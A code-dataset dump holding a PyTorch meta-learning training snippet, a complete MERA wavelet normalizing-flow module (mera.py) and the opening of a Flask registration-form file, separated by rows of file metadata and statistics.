                    # Remaining inner-loop steps (2..update_step) on the support set.
                    for k in range(1, update_step):
                        logits = self.net(x_spt[i], fast_weights)
                        if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                            loss = torch.nn.BCEWithLogitsLoss()
                            loss = loss(logits, y_spt[i])
                        else:
                            loss = F.cross_entropy(logits, y_spt[i])
                        grad = torch.autograd.grad(loss, fast_weights)
                        fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, fast_weights)))
                        if k == update_step - 1:
                            # Query loss only after the final inner step.
                            logits_q = self.net(x_qry[i], fast_weights)
                            if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                                loss_q = torch.nn.BCEWithLogitsLoss()
                                loss_q = loss_q(logits_q, y_qry[i])
                            else:
                                loss_q = F.cross_entropy(logits_q, y_qry[i])
                            l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
                            l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
                            l2_loss = l2_loss * l2_coef
                            losses_q[k + 1] += (loss_q + l2_loss)
                            Losses_q[k + 1] += (loss_q + l2_loss)
                # Metric bookkeeping only — no gradients needed.
                with torch.no_grad():
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        # Multi-label: threshold sigmoids, then flatten to per-bit lists.
                        pred_q = torch.sigmoid(logits_q)
                        pred_q = torch.round(pred_q)
                        y_true = []
                        y_pred = []
                        for m in range(len(y_qry[i])):
                            for n in range(self.label_dim):
                                y_true.append((y_qry[i])[m, n].cpu())
                        for m in range(len(pred_q)):
                            for n in range(self.label_dim):
                                y_pred.append(pred_q[m, n].cpu())
                    else:
                        pred_q = F.softmax(logits_q, dim=1).argmax(dim=1)
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        all_trues.append(y_true)
                        all_predictions.append(y_pred)
                        # _f variants keep the 2-D label matrices for micro-F1.
                        all_trues_f.append((y_qry[i].cpu()).numpy())
                        all_predictions_f.append((pred_q.cpu()).numpy())
                    else:
                        all_trues.append((y_qry[i].cpu()).numpy())
                        all_predictions.append((pred_q.cpu()).numpy())
            # Outer-loop update from the mini-batch's final-step query loss.
            # NOTE(review): divides by batch_size even for a short final batch.
            loss_q = losses_q[-1] / batch_size
            if training == True:
                self.meta_optim.zero_grad()
                loss_q.backward()
                self.meta_optim.step()
        all_trues = np.concatenate(all_trues)
        all_predictions = np.concatenate(all_predictions)
        acc = metrics.accuracy_score(all_trues, all_predictions, normalize=True)
        if self.dataset in ['Cuneiform', 'Sub_Yelp']:
            all_trues_f = np.concatenate(all_trues_f)
            all_predictions_f = np.concatenate(all_predictions_f)
            MiF1s = metrics.f1_score(all_trues_f, all_predictions_f, labels=Lab,
                                     average='micro')
        else:
            MiF1s = metrics.f1_score(all_trues, all_predictions, labels=Lab, average='micro')
        Loss_q = Losses_q[-1] / task_num
        return acc, Loss_q, MiF1s
| 53.717105
| 121
| 0.5218
| 1,985
| 16,330
| 4.012091
| 0.077078
| 0.02009
| 0.010045
| 0.026369
| 0.895907
| 0.893898
| 0.876946
| 0.842793
| 0.842541
| 0.827097
| 0
| 0.015948
| 0.374097
| 16,330
| 303
| 122
| 53.894389
| 0.763233
| 0.002449
| 0
| 0.800725
| 0
| 0
| 0.019518
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.072464
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b87a51b4ac52ce3865112844b856b1a76420df63
| 21,572
|
py
|
Python
|
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 28
|
2021-01-27T00:41:40.000Z
|
2022-02-14T10:11:51.000Z
|
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | null | null | null |
flow/hierarchy/mera.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 6
|
2021-02-03T01:42:08.000Z
|
2021-12-03T17:47:19.000Z
|
import math, torch
from utils import getIndeices
from flow import Flow
import source, utils
class OneToTwoMERA(Flow):
    """Invertible MERA-style wavelet flow using 1-D lifting steps applied
    alternately along the two spatial axes (hence "one-to-two").

    `inverse` maps an image to hierarchical wavelet coefficients (ul plus
    per-level detail channels ur/dl/dr); `forward` reconstructs the image.
    `decimal`/`rounding` implement the fixed-point discretisation, so the
    transform stays exactly invertible on integers.

    NOTE(review): indentation of this block was reconstructed from the
    mirrored structure of `forward`; confirm loop nesting against upstream
    (li012589/NeuralWavelet flow/hierarchy/mera.py).
    """

    def __init__(self, length, layerList, meanNNlist=None, scaleNNlist=None, repeat=1, depth=None, nMixing=5, decimal=None, rounding=None, name="OneToTwoMERA"):
        kernelSize = 2
        # depth defaults to log2(length): halve spatial size until 1.
        if depth is None or depth == -1:
            depth = int(math.log(length, kernelSize))
        if meanNNlist is None or scaleNNlist is None:
            prior = source.SimpleHierarchyPrior(length, nMixing, decimal, rounding)
        else:
            # Learned hierarchical prior: detail channels conditioned on ul.
            lastPrior = source.MixtureDiscreteLogistic([3, 1, 4], nMixing, decimal, rounding)
            prior = source.PassiveHierarchyPrior(length, lastPrior, decimal=decimal, rounding=rounding)
        super(OneToTwoMERA, self).__init__(prior, name)
        self.decimal = decimal
        self.rounding = rounding
        self.repeat = repeat
        self.depth = depth
        # Same layer modules are shared across depths (list replication).
        layerList = layerList * depth
        self.layerList = torch.nn.ModuleList(layerList)
        if meanNNlist is not None and scaleNNlist is not None:
            meanNNlist = meanNNlist * depth
            scaleNNlist = scaleNNlist * depth
            self.meanNNlist = torch.nn.ModuleList(meanNNlist)
            self.scaleNNlist = torch.nn.ModuleList(scaleNNlist)
        else:
            self.meanNNlist = None
            self.scaleNNlist = None

    def inverse(self, x):
        """Image -> wavelet representation (plus zero log-det, as lifting is volume-preserving)."""
        depth = self.depth
        self.meanList = []
        self.scaleList = []
        UR = []
        DL = []
        DR = []
        ul = x
        for no in range(depth):
            # Flatten batch with one spatial axis so lifting acts along the last axis.
            ul = ul.permute([0, 2, 1, 3]).reshape(ul.shape[0] * ul.shape[2], ul.shape[1], ul.shape[3])
            for _ in range(2):
                # Split into even/odd samples along the last axis.
                _x = ul.reshape(*ul.shape[:-1], ul.shape[-1] // 2, 2)
                upper = _x[:, :, :, 0].contiguous()
                down = _x[:, :, :, 1].contiguous()
                # Alternating additive coupling (lifting) steps — exactly invertible.
                for i in range(2 * self.repeat):
                    if i % 2 == 0:
                        tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(upper)) * self.decimal.scaling)
                        down = down - tmp
                    else:
                        tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(down)) * self.decimal.scaling)
                        upper = upper + tmp
                upper = upper.reshape(*upper.shape, 1)
                down = down.reshape(*down.shape, 1)
                ul = torch.cat([upper, down], -1).reshape(*ul.shape)
                # Transpose the two spatial roles so the second pass lifts the other axis.
                ul = ul.reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 3, 2, 1]).reshape(*ul.shape)
            # Restore 4-D (batch, channel, H, W) layout.
            ul = ul.reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 2, 1, 3])
            # Separate coarse (ul) and the three detail quadrants.
            _x = im2grp(ul)
            ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            if self.meanNNlist is not None and self.scaleNNlist is not None and no != depth - 1:
                # Record conditional prior parameters for this level's details.
                self.meanList.append(reform(self.meanNNlist[no](self.decimal.inverse_(ul))).contiguous())
                self.scaleList.append(reform(self.scaleNNlist[no](self.decimal.inverse_(ul))).contiguous())
            UR.append(ur)
            DL.append(dl)
            DR.append(dr)
        # Repack all levels into one tensor (coarse-to-fine).
        for no in reversed(range(depth)):
            ur = UR[no].reshape(*ul.shape, 1)
            dl = DL[no].reshape(*ul.shape, 1)
            dr = DR[no].reshape(*ul.shape, 1)
            ul = ul.reshape(*ul.shape, 1)
            _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
            ul = grp2im(_x).contiguous()
        return ul, ul.new_zeros(ul.shape[0])

    def forward(self, z):
        """Wavelet representation -> image; exact mirror of `inverse`."""
        depth = self.depth
        ul = z
        UR = []
        DL = []
        DR = []
        # Unpack per-level detail quadrants.
        for no in range(depth):
            _x = im2grp(ul)
            ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            UR.append(ur)
            DL.append(dl)
            DR.append(dr)
        # Rebuild level by level, undoing the lifting steps in reverse order.
        for no in reversed(range(depth)):
            ur = UR[no]
            dl = DL[no]
            dr = DR[no]
            ur = ur.reshape(*ul.shape, 1)
            dl = dl.reshape(*ul.shape, 1)
            dr = dr.reshape(*ul.shape, 1)
            ul = ul.reshape(*ul.shape, 1)
            _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
            ul = grp2im(_x).contiguous()
            for _ in range(2):
                ul = ul.permute([0, 3, 1, 2]).reshape(ul.shape[0] * ul.shape[3], ul.shape[1], ul.shape[2])
                _x = ul.reshape(*ul.shape[:-1], ul.shape[-1] // 2, 2)
                upper = _x[:, :, :, 0].contiguous()
                down = _x[:, :, :, 1].contiguous()
                # Couplings applied in reverse with signs flipped (undo).
                for i in reversed(range(2 * self.repeat)):
                    if i % 2 == 0:
                        tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(upper)) * self.decimal.scaling)
                        down = down + tmp
                    else:
                        tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(down)) * self.decimal.scaling)
                        upper = upper - tmp
                upper = upper.reshape(*upper.shape, 1)
                down = down.reshape(*down.shape, 1)
                ul = torch.cat([upper, down], -1).reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 2, 1, 3])
        return ul, ul.new_zeros(ul.shape[0])

    def logProbability(self, x, K=None):
        """Log-likelihood of x: prior log-prob of its wavelet coefficients (log-det is zero)."""
        z, logp = self.inverse(x)
        if self.prior is not None:
            if self.meanNNlist is not None and self.scaleNNlist is not None:
                # Conditional prior uses the mean/scale lists recorded by inverse().
                return self.prior.logProbability(z, K, self.meanList, self.scaleList) + logp
            else:
                return self.prior.logProbability(z, K) + logp
        return logp
def im2grp(t):
    """Regroup a (B, C, H, W) image into flattened 2x2 patches, (B, C, H*W//4, 4).

    Each row of the last axis holds one 2x2 spatial block in row-major order.
    """
    batch, channels, height, width = t.shape[0], t.shape[1], t.shape[2], t.shape[3]
    blocks = t.reshape(batch, channels, height // 2, 2, width // 2, 2)
    # Bring the two intra-block axes next to each other, after the block grid.
    blocks = blocks.permute([0, 1, 2, 4, 3, 5])
    return blocks.reshape(batch, channels, -1, 4)
def grp2im(t):
    """Inverse of im2grp: (B, C, N, 4) patch groups -> (B, C, 2*sqrt(N), 2*sqrt(N)) image.

    Assumes N is a perfect square (the patch grid is square).
    """
    side = int(t.shape[2] ** 0.5)
    patches = t.reshape(t.shape[0], t.shape[1], side, side, 2, 2)
    # Interleave block-grid and intra-block axes back into H and W.
    patches = patches.permute([0, 1, 2, 4, 3, 5])
    return patches.reshape(t.shape[0], t.shape[1], side * 2, side * 2)
def form(tensor):
    """Reassemble (B, C, N, 4) groups into a (B, C, 2*sqrt(N), 2*sqrt(N)) image.

    Functionally the same regrouping as grp2im, but the side length is taken
    from tensor.shape[-2] (the group-count axis).
    """
    side = int(tensor.shape[-2] ** 0.5)
    grouped = tensor.reshape(tensor.shape[0], tensor.shape[1], side, side, 2, 2)
    grouped = grouped.permute([0, 1, 2, 4, 3, 5])
    return grouped.reshape(tensor.shape[0], tensor.shape[1], side * 2, side * 2)
def reform(tensor):
    """Reshape NN output (B, 3*G, H, W) into per-group parameters (B, G, H*W, 3).

    Splits the channel axis into G groups of 3 and moves the 3-way split to
    the last axis, flattening the spatial dims.
    """
    batch = tensor.shape[0]
    groups = tensor.shape[1] // 3
    height, width = tensor.shape[2], tensor.shape[3]
    split = tensor.reshape(batch, groups, 3, height, width)
    split = split.permute([0, 1, 3, 4, 2]).contiguous()
    return split.reshape(batch, groups, height * width, 3)
class SimpleMERA(Flow):
    """Invertible MERA flow that lifts directly on the four 2x2 quadrants
    (ul/ur/dl/dr) of each level, instead of axis-by-axis 1-D lifting.

    All couplings are additive and discretised via `decimal`/`rounding`, so
    the transform is exactly invertible on fixed-point values. `compatible`
    switches to per-input depth (log2 of the spatial size) and requires
    per-depth (unshared) layer/NN lists.

    NOTE(review): indentation of this block was reconstructed from syntax;
    confirm loop nesting against upstream (li012589/NeuralWavelet).
    """

    def __init__(self, length, layerList, meanNNlist=None, scaleNNlist=None, repeat=1, depth=None, nMixing=5, decimal=None, rounding=None, clamp=None, sameDetail=True, compatible=False, name="SimpleMERA"):
        kernelSize = 2
        # depth defaults to log2(length).
        if depth is None or depth == -1:
            depth = int(math.log(length, kernelSize))
        if meanNNlist is None or scaleNNlist is None:
            prior = source.SimpleHierarchyPrior(length, nMixing, decimal, rounding, clamp=clamp, sameDetail=sameDetail, compatible=compatible)
        else:
            lastPrior = source.MixtureDiscreteLogistic([3, 1, 4], nMixing, decimal, rounding, clamp=clamp)
            prior = source.PassiveHierarchyPrior(length, lastPrior, decimal=decimal, rounding=rounding, compatible=compatible)
        super(SimpleMERA, self).__init__(prior, name)
        self.decimal = decimal
        self.rounding = rounding
        self.repeat = repeat
        self.depth = depth
        self.compatible = compatible
        if compatible:
            # Compatible mode needs genuinely per-depth modules, not replicas.
            assert len(layerList) == 4 * repeat * depth
            assert len(meanNNlist) == depth
            assert len(scaleNNlist) == depth
        # Otherwise share the same modules across depths by replication.
        if len(layerList) != 4 * repeat * depth:
            layerList = layerList * depth
        assert len(layerList) == 4 * repeat * depth
        self.layerList = torch.nn.ModuleList(layerList)
        if meanNNlist is not None and scaleNNlist is not None:
            if len(meanNNlist) != depth:
                meanNNlist = meanNNlist * depth
                scaleNNlist = scaleNNlist * depth
            assert len(meanNNlist) == depth
            assert len(scaleNNlist) == depth
            self.meanNNlist = torch.nn.ModuleList(meanNNlist)
            self.scaleNNlist = torch.nn.ModuleList(scaleNNlist)
        else:
            self.meanNNlist = None
            self.scaleNNlist = None

    def inverse(self, x):
        """Image -> hierarchical coefficients; log-det is zero (additive couplings)."""
        if self.compatible:
            depth = int(math.log(x.shape[-1], 2))
        else:
            depth = self.depth
        self.meanList = []
        self.scaleList = []
        ul = x
        UR = []
        DL = []
        DR = []
        for no in range(depth):
            # Split into the four quadrant sub-images of this level.
            _x = im2grp(ul)
            ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            # Round-robin additive couplings: each quadrant updated from the other three.
            for i in range(4 * self.repeat):
                if i % 4 == 0:
                    tmp = torch.cat([ur, dl, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ul = ul + tmp
                elif i % 4 == 1:
                    tmp = torch.cat([ul, dl, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ur = ur + tmp
                elif i % 4 == 2:
                    tmp = torch.cat([ul, ur, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dl = dl + tmp
                else:
                    tmp = torch.cat([ul, ur, dl], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dr = dr + tmp
            if self.meanNNlist is not None and self.scaleNNlist is not None and no != depth - 1:
                # Record conditional prior params of this level's details, given ul.
                self.meanList.append(reform(self.meanNNlist[no](self.decimal.inverse_(ul))).contiguous())
                self.scaleList.append(reform(self.scaleNNlist[no](self.decimal.inverse_(ul))).contiguous())
            UR.append(ur)
            DL.append(dl)
            DR.append(dr)
        # Repack every level's quadrants back into one tensor.
        for no in reversed(range(depth)):
            ur = UR[no].reshape(*ul.shape, 1)
            dl = DL[no].reshape(*ul.shape, 1)
            dr = DR[no].reshape(*ul.shape, 1)
            ul = ul.reshape(*ul.shape, 1)
            _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
            ul = grp2im(_x).contiguous()
        return ul, ul.new_zeros(ul.shape[0])

    def forward(self, z):
        """Hierarchical coefficients -> image; exact mirror of `inverse`."""
        if self.compatible:
            depth = int(math.log(z.shape[-1], 2))
        else:
            depth = self.depth
        ul = z
        UR = []
        DL = []
        DR = []
        # Unpack the per-level quadrants.
        for no in range(depth):
            _x = im2grp(ul)
            ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            UR.append(ur)
            DL.append(dl)
            DR.append(dr)
        for no in reversed(range(depth)):
            ur = UR[no]
            dl = DL[no]
            dr = DR[no]
            # Undo the couplings in reverse order with subtraction.
            for i in reversed(range(4 * self.repeat)):
                if i % 4 == 0:
                    tmp = torch.cat([ur, dl, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ul = ul - tmp
                elif i % 4 == 1:
                    tmp = torch.cat([ul, dl, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ur = ur - tmp
                elif i % 4 == 2:
                    tmp = torch.cat([ul, ur, dr], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dl = dl - tmp
                else:
                    tmp = torch.cat([ul, ur, dl], 1)
                    tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dr = dr - tmp
            # Merge the four quadrants back into the next-larger image.
            ur = ur.reshape(*ul.shape, 1)
            dl = dl.reshape(*ul.shape, 1)
            dr = dr.reshape(*ul.shape, 1)
            ul = ul.reshape(*ul.shape, 1)
            _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
            ul = grp2im(_x).contiguous()
        return ul, ul.new_zeros(ul.shape[0])

    def inference(self, z, endDepth, startDepth=None, sample=False, logbase=-2, round=False):
        """Super-resolve z from startDepth up to endDepth by drawing (or taking
        the mean of) detail coefficients from the prior, then running the
        decoder. Requires shared (replicated) layers — see the asserts.

        sample=True draws from the discrete logistic (temperature via logbase);
        otherwise the distribution mean is used. round=True applies the flow's
        rounding, keeping outputs on the fixed-point grid.
        """
        if round:
            rounding = self.rounding
        else:
            rounding = lambda x: x
        # Shared-layer assumption: layer block repeats identically per depth.
        assert self.layerList[0] is self.layerList[4 * self.repeat]
        _depth = int(math.log(z.shape[-1], 2))
        if startDepth is not None:
            assert _depth == startDepth
        else:
            startDepth = _depth
        assert endDepth > startDepth
        ul = z
        UR = []
        DL = []
        DR = []
        # Decompose the given z into its existing levels of details.
        for no in range(startDepth):
            _x = im2grp(ul)
            if no == startDepth - 1:
                _length = _x.shape[-2]  # group count at the coarsest level
            ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
            UR.append(ur)
            DL.append(dl)
            DR.append(dr)
        if self.meanNNlist is None:
            # Unconditional prior: pre-generate details for the new levels.
            _UR = []
            _DL = []
            _DR = []
            _shapeList = []
            for _ in range(startDepth, endDepth):
                _length *= 4  # each extra level quadruples the group count
                _shapeList.append(_length)
            assert self.prior.priorList[0] is self.prior.priorList[1]
            for no in reversed(range(startDepth, endDepth)):
                if sample:
                    details = utils.sampleDiscreteLogistic([z.shape[0], 3, _shapeList[no - startDepth], 3], self.prior.priorList[0].mean, self.prior.priorList[0].scale + logbase, decimal=self.decimal)
                else:
                    details = rounding(self.decimal.forward_(self.prior.priorList[0].mean.reshape(1, 3, 1, 3).repeat(z.shape[0], 1, _shapeList[no - startDepth], 1)))
                _UR.append(details[:, :, :, 0].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
                _DL.append(details[:, :, :, 1].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
                _DR.append(details[:, :, :, 2].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
            # Prepend the generated levels so the decode loop covers them too.
            startDepth = endDepth
            UR = _UR + UR
            DL = _DL + DL
            DR = _DR + DR
        # Decode all collected levels (same as forward()).
        for no in reversed(range(startDepth)):
            ur = UR[no]
            dl = DL[no]
            dr = DR[no]
            for i in reversed(range(4 * self.repeat)):
                if i % 4 == 0:
                    tmp = torch.cat([ur, dl, dr], 1)
                    tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ul = ul - tmp
                elif i % 4 == 1:
                    tmp = torch.cat([ul, dl, dr], 1)
                    tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    ur = ur - tmp
                elif i % 4 == 2:
                    tmp = torch.cat([ul, ur, dr], 1)
                    tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dl = dl - tmp
                else:
                    tmp = torch.cat([ul, ur, dl], 1)
                    tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                    dr = dr - tmp
            ur = ur.reshape(*ul.shape, 1)
            dl = dl.reshape(*ul.shape, 1)
            dr = dr.reshape(*ul.shape, 1)
            ul = ul.reshape(*ul.shape, 1)
            _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
            ul = grp2im(_x).contiguous()
        if self.meanNNlist is not None:
            # Conditional prior: details for each new level depend on the current ul.
            assert self.meanNNlist[0] is self.meanNNlist[1]
            assert self.scaleNNlist[0] is self.scaleNNlist[1]
            for no in range(startDepth, endDepth):
                mean = reform(self.meanNNlist[0](self.decimal.inverse_(ul))).contiguous()
                if sample:
                    scale = reform(self.scaleNNlist[0](self.decimal.inverse_(ul))).contiguous()
                    details = utils.sampleDiscreteLogistic(mean.shape, mean, scale + logbase, decimal=self.decimal)
                else:
                    details = rounding(self.decimal.forward_(mean))
                ur = details[:, :, :, 0].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
                dl = details[:, :, :, 1].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
                dr = details[:, :, :, 2].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
                # Decode this level with the shared (depth-0) layers.
                for i in reversed(range(4 * self.repeat)):
                    if i % 4 == 0:
                        tmp = torch.cat([ur, dl, dr], 1)
                        tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                        ul = ul - tmp
                    elif i % 4 == 1:
                        tmp = torch.cat([ul, dl, dr], 1)
                        tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                        ur = ur - tmp
                    elif i % 4 == 2:
                        tmp = torch.cat([ul, ur, dr], 1)
                        tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                        dl = dl - tmp
                    else:
                        tmp = torch.cat([ul, ur, dl], 1)
                        tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
                        dr = dr - tmp
                ur = ur.reshape(*ul.shape, 1)
                dl = dl.reshape(*ul.shape, 1)
                dr = dr.reshape(*ul.shape, 1)
                ul = ul.reshape(*ul.shape, 1)
                _x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
                ul = grp2im(_x).contiguous()
        return ul

    def logProbability(self, x, K=None):
        """Log-likelihood of x under the hierarchical prior (log-det is zero)."""
        z, logp = self.inverse(x)
        if self.prior is not None:
            if self.meanNNlist is not None and self.scaleNNlist is not None:
                return self.prior.logProbability(z, K, self.meanList, self.scaleList) + logp
            else:
                return self.prior.logProbability(z, K) + logp
        return logp

    def sample(self, batch, sample=False, logbase=0):
        """Draw `batch` images: sample the coarsest level from the prior, then
        super-resolve it to full depth via inference()."""
        if self.meanNNlist is not None:
            z = self.prior.lastPrior.sample(batch)
        else:
            z = self.prior.priorList[-1].sample(batch)
        z = grp2im(z)
        return self.inference(z, self.depth, startDepth=1, sample=sample, logbase=logbase)
| 46.491379
| 224
| 0.511311
| 2,804
| 21,572
| 3.871612
| 0.038516
| 0.054164
| 0.039333
| 0.042004
| 0.85888
| 0.842299
| 0.811533
| 0.789425
| 0.778464
| 0.743552
| 0
| 0.036854
| 0.325793
| 21,572
| 463
| 225
| 46.591793
| 0.709571
| 0
| 0
| 0.75
| 0
| 0
| 0.00102
| 0
| 0
| 0
| 0
| 0
| 0.030928
| 1
| 0.036082
| false
| 0.005155
| 0.010309
| 0.007732
| 0.092784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2965f8d2fffb2f571a99daf7b580ea510ab67bd
| 9,524
|
py
|
Python
|
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | 1
|
2022-02-15T01:37:16.000Z
|
2022-02-15T01:37:16.000Z
|
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | null | null | null |
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm, RecaptchaField
from wtforms import StringField, SubmitField, SelectField, RadioField
from wtforms.validators import DataRequired, Length, Email, ValidationError
from my_data_validators import *
from select_fields_data import *
from models import User
from dotenv import load_dotenv
# Load .env so COMPANY_END (the required suffix for company names, used by
# RegisterForm.validate_name) is available from the environment.
load_dotenv()
COMPANY_END=os.environ.get('COMPANY_END')
class GoogleForm(FlaskForm):
    """Registration form shown when the user signs up via Google.

    Google supplies the name/email, so only the remaining profile fields are
    collected here. WTForms automatically invokes the ``validate_<field>``
    methods below as inline validators.
    """
    phone = StringField(label="", validators=[DataRequired()],
                        render_kw={"placeholder": "Phone Number ex: +209996752223"})
    country = SelectField(label="", validators=[DataRequired()], choices=countries())
